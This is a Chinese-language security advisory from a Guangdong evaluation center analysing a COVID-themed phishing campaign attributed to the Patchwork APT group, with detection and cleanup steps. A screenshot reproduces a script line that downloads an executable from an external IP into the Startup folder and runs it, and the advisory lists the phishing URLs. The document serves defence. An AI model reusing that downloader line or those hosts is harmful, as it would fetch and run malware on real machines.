# 广东省信息安全测评中心

## 关于境外 APT 组织借新型冠状肺炎疫情对我国发起网络 攻击事件的初步分析报告和自检建议

贵单位:

近期,境外 APT 组织趁我国抗击新型冠状病毒疫情之际, 冒充国家卫生健康委员会、疫情防疫等相关部门,向我国单位 和个人投放与新型冠状肺炎疫情相关的钓鱼邮件。钓鱼邮件附 带恶意链接与包含恶意代码的 office 文档附件,利用仿冒页 面实现对用户信息的收集,诱导用户执行恶意文档中的宏,向 受害用户 windows 主机上植入木马程序,实现远程控制和信息 窃取。

经关联分析发现,相似样本至少于 2019 年底开始使用, 根据样本特征、攻击手法及资产特点判断,幕后攻击者疑似为 印度背景黑客组织"白象"。其仿冒站点域名为"nhc-gov.com", 于 2020 年 1 月 23 日注册, 1 月 30 日上线,极其类似我国卫健 委官网"nhc.gov.cn"。钓鱼邮件附件为新型肺炎话题,伪造 散布"武汉旅行信息收集申请表.x1sm"、"卫生部指令.docx" 等疫情相关字眼的 office 文档附件,诱导用户点击下载具备 信息窃取、远程控制功能的远控木马。我中心进一步对样本进

1

行分析,发现受害者经诱导对 office 文档进行相关操作,将 被植入远控木马,一旦植入成功,则可造成隐私泄露、数据丢 失、人员敏感信息泄露、计算机故障等危害,危及个人乃至企 业、政府等单位的网络和信息安全。

现将我中心针对本次攻击事件样本分析情况及排查建议 提供贵单位,建议贵单位开展相应梳理排查工作,通过宣贯提 高相关人员安全意识,培养良好上网习惯,时刻警惕仿冒网站, 针对网络上常见的水坑攻击,钓鱼攻击等事件,警惕来源不明 的邮件及文本信息,勿轻易访问未经核实的链接及附件,安装 杀毒软件并及时更新病毒库,积极落实网络安全法相关责任要 求,采取技术措施和其他必要措施,消除安全隐患。相信在我 们的共同努力下,定能守住网络空间的安宁,为我国当前抗击 新冠肺炎疫情保驾护航。

(注: "白象"又名 Patchwork、摩诃草,江湖人称正规三军,是具有印度背景的 APT 组织,自 2015 年 12 月开始活跃,长期针对中国军队、政府等部门开展 渗透攻击,历来蹭中国新闻热点极其积极,此前曾就军运会为诱饵发起过攻击。)

附件: APT 攻击样本分析及排查方法和建议

#### 广东省信息安全测评中心

#### 2020年2月13日

2

### APT 攻击样本分析及排查方法和建议

一、 样本分析

(一) "卫生部指令.docx"

 通过访问链接 http://nhc-gov.com/h\_879834932/卫生 部指令.docx,将直接下载名为"卫生部指令.docx"的文档;

2. 打开文档如图,未作操作时,文档即发送三个请求;

| <b>8</b> * |                 | <b>华人民共和国</b><br>nal Health Commission o | 国家卫生<br>of the People's Re | 建康委员会<br>public of China |     |
|------------|-----------------|------------------------------------------|----------------------------|--------------------------|-----|
|            |                 | 音符:请尽快到                                  | 完成以下内容                     |                          |     |
| 1          | 家提供的信息将有助       | 力于加强疫情监测和报行                              | 告工作,所有同                    | 也和工作人员必须在最               | 最近  |
| 1          | 5 天内提供他们到远      | 武汉的旅行或与来自武                               | 汉的人见面的信                    | 息。如不符合上述条                | 件,  |
| ĩ          | <b> </b>        | 的表格。                                     |                            | Refer                    |     |
| ì          | 青填写以下资料:<br>↔   |                                          |                            | - KSKA                   |     |
|            |                 | 信息                                       | 你遇到的                       | 人的细节                     |     |
|            | 姓名              | 当前位置                                     | 姓名                         | 当前位置                     | +   |
|            |                 | N N                                      | V                          |                          |     |
|            |                 | +                                        |                            | - ////                   | K 3 |
|            | A LE CONTRACTOR |                                          |                            |                          |     |
| C          | ] 本人确认此表格所      | 是供的资料真实、完整及准                             |                            |                          | 4/  |
| c          | ] 本人确认此表格所      | 是供的资料真实、完整及准                             |                            |                          |     |
|            | ] 本人确认此表格所      |                                          |                            |                          |     |

3. 当受害者填完表中信息后,点击"提交",word 里的代码将下载"submit\_details.exe"文件,此.exe 文件即真正的木马文件;

4. 在文档中最后一行使用说明的小字的诱导下,受害者会点击该文件,此时木马被执行。

(注:此翻译拙劣的界面可见多处明显的错别字,可能为翻译器生硬翻译得来, 国家单位所发正式文件多经过审核,出现此情况的概率极低,在安全意识教育中 可作为非技术人员识别 apt 攻击诱饵文件的一种方法。)

#### (二) "武汉旅行信息收集申请表.x1sm"

通过访问链接 http://nhc-gov.com/form.html?0ZBT
 g\_TFORM,将直接下载名为"武汉旅行信息收集申请表.x1sm"
 的文档;

2. 打开文档,若宏已启用,则宏代码发送请求到远程服务器下载 window.sct,即使宏未启用,文档中亦有"启用内容"字样诱导目标启用宏;

| Image: Section of the section of the sectio |                                          |                                         |           |
|----------------------------------------------------------------------------------------------------|------------------------------------------|-----------------------------------------|-----------|
| 1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1     1                                                                                                        |                                          |                                         |           |
| Ministry       Ministry                                                                                                    |                                          |                                         |           |
| 工作希認問   部の   部の   部の     予確認知 Lost #SKA, 現現法用 Lost #SKA, 現現法用 Lost #SKA, 現現法用 Lost #SKA, 現現法用 Lost #SKA, 現現法用 Lost #SKA, 現現法用 Lost #SKA, 現現法用 Lost #SKA, 用内容 " QA = A - C - C - C & D - C & D - D - D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D - D & D &                                                                                                    | 一 一 内市                                   | 18 (2) 等388 (2) (2) 里の留口の田 * *          |           |
| ● Passe box #x828.8, \$2848x80, Box # \$74x8. \$200x20103103 zaba.     >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>                                                                                                    | 工作簿视图                                    | 显示 显示比例 窗口 宏                            |           |
| A3     ····································                                                                                                    | 戸品通知 Excel 未被激活。要继续使用 E                  | xxel, 而不中斷, 请在 2020年2月16日 之前激活。 激活(A)   |           |
| A       B       C       D         A       B       C       D       D                                                                                                    | 43 * : × √ fr                            | 购售健康准备信息的由语表                            |           |
| A       B       C       这是一个爱母护的文档,点击"名用内容"以如写详细信息         2       没算人代表:                                                                                                    |                                          |                                         |           |
| 加速       1 x x y UALS, x x x x x x x x x x x x x x x x x x x                                                                                                    | A                                        | B C D D D D D D D D D D D D D D D D D D | é         |
| 收集健患准备信息的申请未         D       D         D       D                                                                                                    | 2                                        |                                         | 20        |
| D 医院/部门名称:       一       一       一       一       一       一       一       一       一       一       一       一       二       二 <th1367< th="">       二       二</th1367<>                                                                                                    | 3                                        | 收集健康准备信息的申请表                            |           |
| 1) D 政府(第) 1269 :       20         2) D 政府(第) 1269 :       20         2) D 政府(第) 1269 :       20         3) 想试:       20         3) 想试:       20         4) J D 政府(第) 1269 :       20         5) D 政府(第) 1269 :       20         10       20         11       20         12       电子标卡 :         13       見信 :         14       20         15       1         16       1         17       1         18       1         19       1         10       1         11       1         12       1         13       1         14       1         15       1         16       1         17       1         18       1         19       1         10       1         11       1         12       1         13       1         142       1         15       1         16 </td <td>4</td> <td></td> <td></td>                                                                                                    | 4                                        |                                         |           |
| 2) 负责人/代表:   26%:     26%:   26%:     11   26%:     12   8%:     13   8%:     14   10     15   3     16   1     17   4     18   1     19   1     19   1     11   1     11   1     12   1     13   1     14   1     15   1     15   1     16   1     17   4     18   1     19   1     19   1     11   1     11   1     12   1     13   1     14   1     15   1     16   1     17   1     17   1     18   1     19   1     10   1     11   1     11   1     12   1     13   1     14   1     15   1     15   1     16   1 <                                                                                                    | 5 1) 医院/部门名称 :                           |                                         |           |
| 名称:       名称:         1       名称:         月前江(南:)       月前江(南:)         月前江(南:)       中間(h:)         电(水) 手机号为:                                                                                                    | 7 2) 负责人/代表 :                            |                                         |           |
| 9   指定: 6: 7     9   指述: 6: 7     9   20     11   电子单号,:     电式: 40                                                                                                    | 8                                        | 名称:                                     |           |
| 10   劳页证号句::     11   电荷(#:):     12   电荷(#:):     13   ●     14   ●     15   ●     16   ●     17   •     17   •     18   ●     19   ●     19   ●     19   ●     19   ●     19   ●     19   ●     19   ●     19   ●     19   ●     10   ●     11   ●     12   ●     13   ●     14   ●     15   ●     16   ●     17   ●     18   ●     19   ●     10   ●     10   ●     11   ●     12   ●     13   ●     14   ●     15   ●     16   ●     17   ●     18   ●     19   ●     10   ●     10   ●     11   ●     12   ●                                                                                                    | 9                                        | 指定/ 衔:                                  |           |
| 1   电温/学机号码。:     20   地址:     21                                                                                                    | 10                                       | 爱价证亏约。:                                 |           |
| 1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1                                                                                                          | 12                                       | セリーディー<br>申诺/ 手机号码。:                    |           |
| 1   1   1   1   1     3   建址:   1     3   建址:   1     4   5   1     5   Explosing bigging bigginging bigging                                                                                                    | 13                                       |                                         |           |
| 30 夏度:          4 人力资產:       E1人覧:         5 原泉       許理人乃数:         5 原泉       許理人乃数:         5 原泉       第二         5 原泉       月市:         4 回 年展为的病人数:           2 回 年展为的病人数:           2 回 年展为的病人数:           2 回 年展为的病人数:           2 回 年展为的病人数:           2 回 月市<:                                                                                                    | 14                                       |                                         |           |
| 17   4) 人力资業:   正     18   医生人對:     19   护理人员数:     19   护理人员数:     19   原素测试交验室设施:     20   原素测试交验室设施:     21   パーパー:     22   日/市:     23   50 医病影务区量金:     24   日/市:     25   日/市:     26   日/市:     27   10     28   日/市:     29   日/市:     29   日/市:     20   毎年影务的病人数:     21   一     22   日/市:     23   日/市:     24   日/市:     25   日/市:     26   日/市:     27   日/市:     28   日/市:     29   日/市:     29   日/市:     20   日/日:     21   日/日:     22   日/日:     23   日/日:     24   日/日:     25   日/日:     26   日/日:     27   日/日:     28   日/日:     29   日/日:     29   日/日:     29   日/日:     29   日/日:     29   日/日: <td>15 3) <b>лен</b>:</td> <td></td> <td></td>                                                                                                    | 15 3) <b>лен</b> :                       |                                         |           |
| 18   医生人数:     29   序型人为数:     22   房香湖试会堂设编:     23   月市:     24   月市:     地区:   月市:     週   日本     10   毎年服务的病人数:     27   重江金     28   ●     29   ●     29   ●     20   ●     21   ●     22   ●     23   ●     24   ●     25   ●     26   ●     27   ●     28   ●     29   ●     29   ●     20   ●     21   ●     22   ●     22   ●     23   ●     24   ●     25   ●     26   ●     27   ●     27   ●     28   ●     29   ●     29   ●     20   ●     21   ●     22   ●     23   ●     24   ●     25   ●     26   ●      27                                                                                                    | 17 4) 人力资源 :                             |                                         |           |
| 19   伊賀人均数:<br>· 伊教:<br>· 伊教:<br>· 伊教/       · 伊教/                                                                                                    | 18                                       | 医生人数 :                                  |           |
|                                                                                                    | 19                                       | 护理人员数::                                 |           |
| 22       月7日の日本星を留い         24       50         25       月/市:         26       地区:         27       見言:         28       6         30       毎年展労的病人数:         通貨:       二         31       一         32       ●         32       ●         33       ●                                                                                                    | 20                                       | 本92.:<br>疟素潮洋立验室沿路。                     |           |
| 23       50       医院最务区覆盖:       目/市:       1         25       日/市:       地区:       1       1         27       日       日       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1       1                                                                                                    | 22                                       |                                         |           |
| 24 50 医病態列以電金:            月/市:<br>地区:<br>世話:            月/市:<br>地区:<br>世話:            担:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            世話:            #:            #:            #:            #:            #:            #:            #:            #:            #:            #:            #:            #:            #:            #:            #:            #:            #:            :::            #:            ::            ::::            ::::            :::::::::::::::::::::::::                                                                                                    | 23                                       |                                         |           |
| 2012                                                                                                    | 24 5) 医院服务区覆重 :<br>25                    | 月/市 .                                   |           |
| 27       自:          28 0) 每年最秀的病人数:           30       最近设态的伟人;          31       盛以疾病类型:          28 0)       多少天的伟人;                                                                                                    | 26                                       |                                         |           |
| 28<br>9 <b>9 毎年服务的病人数 :</b><br>30<br>31<br>32<br>32<br>33<br>3<br>3<br>3<br>3<br>3<br>3<br>3<br>3<br>3<br>3<br>3<br>3                                                                                                    | 27                                       | 县.                                      |           |
| (2) 09 年末方田地人致:                                                                                                    | 28 (22) (22) (22) (22) (22) (22) (22) (2 |                                         |           |
|                                                                                                    | 29 (b) 母牛服务的病人数 :                        |                                         |           |
| 32                                                                                                    | 31                                       |                                         |           |
| 33 多少天的病人:                                                                                                    | 32                                       | 症状:                                     | 激活 Window |
|                                                                                                    | 33                                       | 多少天的病人:                                 |           |

3. Window.sct 文件用于下载伪装成 jpeg 的 exe 文件,即真正的木马文件,如下图:

|             | 💰 window.set                                         | 2020/2/10 11:41    | Windows Script            | 1 KB                          |                         |           |
|-------------|------------------------------------------------------|--------------------|---------------------------|-------------------------------|-------------------------|-----------|
| sers\lx     | i\Desktop\白象样本\45.153.184.67\733f94b5080775228e7ddeb | c7f1029ec0dac89a76 | d5dbd0b703e3c4a406e       | e663-window.sct-\window.sct - | Notepa —                |           |
| 编辑(E        | ),                                                   | [M) 运行(R) 插件(P)    | ) 窗口(W) ?                 |                               |                         |           |
|             | 🕞 🕞 😂   🖌 🛍 🖺   Ə 🗲   📾 🏣   🔍 🔍   🖼 🖬                | 1 📑 🖉 📓            | ) 🔊 🚞 👁 🔳 🛙               | D D 🔤 💆                       |                         |           |
| e.logE      | 3 🔚 FileUpload. py 🛛 🔚 app. html 🗷 🔚 window. sot 🗵   |                    |                           |                               |                         |           |
|             |                                                      |                    |                           |                               |                         |           |
| Ŧ           |                                                      |                    |                           | _                             |                         |           |
| ļ.          |                                                      |                    |                           |                               |                         |           |
| <b>}</b> ▼a | r t=e.SpecialFolders("Startup")+decode("XHR1k        | XAuZXhl");downl    | oadFile " <u>http://4</u> | 5.153.184.67/window.jpe       | <u>eq</u> ",t);e.run('' | ''+t+'"') |

#### 二、 排查方法

 全盘搜索 submit\_details.exe、submit\_details.exe、 kt\_new.png、CnC\_Client.pdb,查找可执行文件是否存在,存 在则删除。

2. 打开注册表->编辑->查找 输入 submit\_details.exe 查 找注册表是否有相关值,有则删除。

查找 C: \Windows\Prefetch\路径下是否有类似于 SUBMIT
 \_DETAILS. EXE-xxxxxxx. pf 预读取文件,有则删除。

 全盘查找 window.sct, window.jpeg, CnC\_Client.pdb 文件并删除。

5. 查找 C: \Microsoft\msupdate.exe 和 C: \Users\用户名 \AppData\Roaming\msupdate.exe 并删除。

6. 打开控制面板,小图标视图下打开"管理工具"->"任务计划程序",查看是否有如下图所示的启动任务程序 C:\Microsoft\msupdate.exe,有则表示主机已被攻击。删除该计划任务。

| 🕑 任务计划程序            |                                                    |             |                                                    |                    |                    |                          |         |
|---------------------|----------------------------------------------------|-------------|----------------------------------------------------|--------------------|--------------------|--------------------------|---------|
| 文件(F) 操作(A) 查看(V) 著 | 爱助(H)                                              |             |                                                    |                    |                    |                          |         |
|                     |                                                    |             |                                                    |                    |                    |                          |         |
| 任务计划程序(本地)          | 名称                                                 | 状态          | 触发器                                                | 下次运行时间             | 上次运行时间             | 上次运行结果                   | 创建者     |
| > 🔂 任务计划程序库         | Microsoft Update                                   | 准备就绪        | 登录 DESKTOP-VSR91KU\lxj 时                           |                    | 1999/11/30 0:00:00 | 任务尚未运行。 (0x41303)        |         |
|                     | (B) OneDrive Standalone Update                     | 准备就绪        | 在 1992/5/1 的 10:00 时 - 触发后,无限期地每隔 1.00:00:00 重复一次。 | 2020/2/12 12:26:51 | 2020/2/11 12:42:42 | (0x8004EE04)             | Microso |
|                     | TencentCloud askMachineCore                        | 准备就绪        | 登录 DESKTOP-VSR91KU\lxj 时                           |                    | 2020/2/11 23:05:13 | 系统找不到指定的文件。 (0x80070002) | 1       |
|                     | ( User_Feed_Synchronization-{6                     | 准备就绪        | 在每天的 2:22 - 触发器在 2030/2/12 2:22:09 时过期。            | 2020/2/12 2:22:09  | 2020/2/11 21:19:01 | 操作成功完成。 (0x0)            | DESKTO  |
|                     | WpsExternal_bi_20200210132                         | 准备就绪        | 在 2020/2/10 的 8:37 时 - 触发后,无限期地每隔 02:00:00 重复一次。   | 2020/2/12 0:37:09  | 2020/2/11 22:37:09 | 操作成功完成。(0x0)             | bg      |
|                     | ( ipsopulation in the state                        | 12.24 (10)8 |                                                    | 2020/2/11 200101   | 2020/2/11 22:07:07 | 381 Pro031 Loop (0x0)    | 19      |
|                     |                                                    |             |                                                    |                    |                    | _                        | >       |
|                     | 1998年1月9日,赵秀道定任务启动时发生的操作。若要更改这些操作,使用"属性"命令打开任务属性页。 |             |                                                    |                    |                    |                          |         |
|                     | 操作 详细信号                                            |             |                                                    |                    |                    |                          |         |
|                     | 启动程序 C:\Microso                                    | ft\msupda   | te.exe                                             |                    |                    |                          |         |

#### 三、 安全建议

1. 不要轻易点击和打开来历不明的链接和附件,已打开钓 鱼邮件链接或附件的用户,应立即修改相关账号密码并及时联 系网络安全技术人员,进行风险排查同时谨慎使用 Office 宏 功能。

及时升级系统,安装杀毒软件,并更新病毒库,定期查杀;

3. 强化风险意识,切实加强安全防范,不要通过 QQ、微信等社交媒体打开、传播可疑文档或.EXE 文件。

#### 广东省信息安全测评中心

#### 2020年2月13日